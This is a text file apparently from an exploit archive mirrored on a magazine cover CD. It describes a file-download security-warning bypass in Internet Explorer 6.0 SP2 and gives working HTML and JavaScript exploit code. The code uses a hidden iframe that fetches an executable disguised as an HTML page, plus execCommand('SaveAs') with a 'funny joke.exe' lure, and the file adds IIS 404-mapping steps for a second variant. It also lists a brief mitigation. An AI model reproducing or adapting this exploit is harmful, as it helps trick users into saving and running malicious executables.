home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webbrowser / IE / IESP2Unpatched.txt < prev    next >
Text File  |  2005-02-12  |  2KB  |  59 lines
  1. Internet Explorer 6.0 SP2 File Download Security Warning Bypass Exploit
  2.  
  3. Microsoft Internet Explorer (including IE for Windows XP SP2) is reported vulnerable to a file download security warning
  4. bypass. This unpatched flaw may be exploited to download a malicious executable file masqueraded as a HTML file.
  5.  
  6. Secunia did not release the technical details (aka Security by Obscurity) thus we publish this page (aka Full Disclosure)
  7.  
  8. Solution
  9.  
  10. [EN] Disable Active Scripting and the "Hide file extensions for known file types" option [Tools->Folder Options->View]
  11. [FR] DΘsactivez Active Scriptig et l'option "Masquer les extensions des fichiers dont le type est connu [Panneau de
  12. configuration -> Options des dossiers -> Affichage] 
  13.  
  14.  
  15. Credits : go to cyber flash
  16.  
  17.  
  18. How does it work ? A.K.A Exploit
  19.  
  20. The following code requires no special server setup, and should work from any webpage that IE 6.0 fetches:
  21.  
  22. <html>
  23. <body>
  24. <iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>Click
  25. <a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
  26. here</a>.
  27. </body>
  28. </html>
  29.  
  30. Also, here's an example that requires modifying the IIS Error Mapping Properties (see below):
  31. <html>
  32. <body>
  33. <iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>Click
  34. <a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
  35. here</a>.
  36. </body>
  37. </html>
  38.  
  39. Steps to configure IIS:
  40.  
  41. Launch Internet Information Services manager.
  42. Under the 'Custom Errors' tab, modify the Error Mapping Properties as follows:
  43.  
  44.    1. Error Code: 404
  45.    2. Default Text: Not Found
  46.    3. Message Type: URL
  47.    4. URL: /v.exe (name of the executable)
  48.  
  49. Within the HTML page, insert an IFRAME as follows:
  50.  
  51. <iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>
  52.  
  53. The file 'vengy404.htm' intentionally doesn't exist on the server, so it will trigger a 404 error message as defined above. But, the javascript code below references the stealthy v.exe data within the frame 'NotFound' and is linked to 'funny joke.exe' when prompted to save the file:
  54.  
  55. javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');
  56.  
  57.  
  58. ╗ The original advisory (mirrored by K-OTik) is available here
  59.